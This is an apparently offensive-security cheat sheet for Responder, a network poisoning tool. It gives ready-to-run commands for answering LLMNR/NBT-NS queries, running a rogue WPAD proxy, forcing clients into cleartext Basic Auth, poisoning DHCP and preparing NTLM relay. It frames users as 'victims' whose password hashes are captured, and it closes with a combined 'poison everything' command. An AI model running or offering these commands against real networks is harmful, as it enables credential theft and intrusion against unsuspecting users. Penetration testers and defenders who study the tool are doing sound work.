Responder Command List
Responder Command Guide
Responder is a LLMNR, NBT-NS and MDNS poisoner. It answers specific NBT-NS (NetBIOS Name Service) queries based on their name suffix.
Top 10 Useful Commands
1. Basic Analysis (Listen Only)
responder -I eth0 -A
Explanation: Analyze mode (-A). See what requests are flying around the network without poisoning.
2. Start Poisoning
responder -I eth0
Explanation: Start responding to LLMNR/NBT-NS queries. Clients will send you their NTLMv2 hashes.
3. Force WPAD auth
responder -I eth0 -w
Explanation: Start the WPAD rogue proxy server.
4. Force Basic Auth
responder -I eth0 -b
Explanation: Force clients to send cleartext credentials (Basic Auth) instead of encrypted hashes.
5. Fingerprint
responder -I eth0 -F
Explanation: Attempt to fingerprint host OS versions passively.
6. Verbose
responder -I eth0 -v
Explanation: Show more details about captured packets.
7. Disable SMB
# Edit Responder.conf -> Turn "SMB = Off"
Explanation: Essential when doing NTLM Relay attacks (you can't bind port 445 if you want to relay it).
8. DHCP Poisoning
responder -I eth0 -d
Explanation: Inject WPAD via DHCP responses (dangerous/noisy).
9. External IP
responder -I eth0 -e 10.10.10.5
Explanation: Tell victims to connect to a specific IP.
10. Kill Session
# (Ctrl+C)
Explanation: Responder should be stopped gracefully to revert network changes.
The Most Powerful Command
responder -I eth0 -dwv
Explanation: Poison everything (LLMNR, NBT-NS, DNS, WPAD). If a user types a wrong server name (e.g., \fileserverr), you get their hash.